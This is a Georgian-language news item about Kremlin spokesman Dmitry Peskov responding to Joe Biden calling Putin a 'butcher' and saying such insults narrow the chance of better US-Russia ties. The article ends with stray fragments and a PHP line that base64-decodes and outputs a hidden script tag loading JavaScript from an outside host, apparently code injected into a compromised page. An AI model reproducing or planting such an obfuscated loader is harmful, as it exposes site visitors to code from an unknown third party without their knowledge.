celsiusi
ავერსი შნაიდერი
კრემლის პრესმდივანი დიმიტრი პესკოვი შეერთებული შტატების პრეზიდენტის მიერ დღეს, ვარშავაში გაკეთებულ განცხადებას გამოეხმაურა, რა დროსაც ჯო ბაიდენმა რუსეთის პრეზიდენტ ვლადიმერ პუტინს „ყასაბი“ უწოდა. პესკოვის თქმით, უცნაურია პუტინის წინააღმდეგ ბაიდენისგან ბრალდებების მოსმენა, რომელიც იუგოსლავიის დაბომბვისა და ხალხის მკვლელობის მოწოდებით გამოდიოდა.
 
პესკოვის განცხადებით, თეთრი სახლის ლიდერის პირადი შეურაცხყოფა რუსეთის პრეზიდენტის მიმართ ავიწროვებს შესაძლებლობის ფანჯარას მოსკოვსა და ვაშინგტონს შორის ურთიერთობების გაუმჯობესებისთვის.
 
„რა თქმა უნდა, ყოველ ჯერზე, ასეთი პირადი შეურაცხყოფა ავიწროებს შესაძლებლობის ფანჯარას ჩვენი ორმხრივი ურთიერთობებისთვის აშშ-ის ამჟამინდელი ადმინისტრაციის პირობებში. აუცილებელია ამის გაცნობიერება", - განუცხადა პესკოვმა რუსეთის სახელმწიფო საინფორმაციო სააგენტო „TASS-ს“.
867
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");